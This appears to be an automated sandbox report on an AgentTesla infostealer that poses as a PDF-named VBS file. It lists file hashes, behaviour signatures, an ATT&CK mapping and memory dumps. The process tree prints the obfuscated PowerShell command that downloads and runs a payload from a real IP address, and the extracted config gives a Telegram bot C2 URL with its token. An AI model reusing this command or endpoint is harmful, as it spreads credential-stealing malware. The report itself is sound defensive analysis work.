Overview

overview

10

Static

static

183287857-...DF.vbs

windows7_x64

10

183287857-...DF.vbs

windows10_x64

10

Analysis

  • max time kernel
    136s
  • max time network
    125s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    21-10-2021 18:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    183287857-050118-sanlccjavap0004-6561_PDF.vbs

  • Size

    440B

  • MD5

    fd5d9dd54f30ebeda49b3f3d9d57d1c6

  • SHA1

    bdc86ae73f8ea542af15ed6a5643b1a9cfd8ea51

  • SHA256

    75e81b26f76f0050408e59a9d3606e0ee6d474ffa9e2296187f582884fa2f59f

  • SHA512

    60857407aa6143be42149dac675348dcbfaa1a9ed8dd66e66fe936dbabca8dd490d3019573fe940631741047e7edb0b0df9730a33ccaf48aed077e939608b7b9

Score
10/10
agentteslacollectionkeyloggerspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://202.55.132.106/Bypass3.txt

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot1923270472:AAFHljVp-f8Q5-X0iy70Vfe0aTch5THPa-U/sendDocument

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • AgentTesla Payload 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\183287857-050118-sanlccjavap0004-6561_PDF.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &('{1}{0}'-f'X','IE')(&('{1}{0}{2}' -f'je','New-Ob','ct') ('{1}{2}{0}' -f 'WebClient','Ne','t.')).('{2}{3}{1}{0}' -f'dString','nloa','D','ow').InVoKe('http://202.55.132.106/Bypass3.txt')
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:724
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • outlook_office_path
        • outlook_win_path
        PID:3200

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Email Collection

1
T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/724-129-0x0000029AF6690000-0x0000029AF6692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-151-0x0000029AF80A0000-0x0000029AF80A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/724-117-0x0000029AF6690000-0x0000029AF6692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-118-0x0000029AF6690000-0x0000029AF6692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-119-0x0000029AF6690000-0x0000029AF6692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-120-0x0000029AF6690000-0x0000029AF6692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-122-0x0000029AF8670000-0x0000029AF8672000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-121-0x0000029AF8000000-0x0000029AF8001000-memory.dmp
    Filesize

    4KB

    Download
  • memory/724-123-0x0000029AF8673000-0x0000029AF8675000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-124-0x0000029AF6690000-0x0000029AF6692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-125-0x0000029AF6690000-0x0000029AF6692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-126-0x0000029AF6690000-0x0000029AF6692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-127-0x0000029AF6690000-0x0000029AF6692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-128-0x0000029AFA750000-0x0000029AFA751000-memory.dmp
    Filesize

    4KB

    Download
  • memory/724-152-0x0000029AF6690000-0x0000029AF6692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-133-0x0000029AF8676000-0x0000029AF8678000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-144-0x0000029AF8070000-0x0000029AF8094000-memory.dmp
    Filesize

    144KB

    Download
  • memory/724-116-0x0000029AF6690000-0x0000029AF6692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/724-115-0x0000000000000000-mapping.dmp
    Download
  • memory/3200-150-0x000000000043774E-mapping.dmp
    Download
  • memory/3200-153-0x0000000000730000-0x000000000076C000-memory.dmp
    Filesize

    240KB

    Download
  • memory/3200-155-0x0000000005060000-0x0000000005061000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3200-156-0x0000000004D20000-0x0000000004D21000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3200-157-0x0000000004B60000-0x000000000505E000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/3200-158-0x0000000005000000-0x0000000005001000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3200-159-0x00000000058C0000-0x00000000058C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3200-160-0x0000000005F90000-0x0000000005F91000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3200-161-0x0000000005A40000-0x0000000005A41000-memory.dmp
    Filesize

    4KB

    Download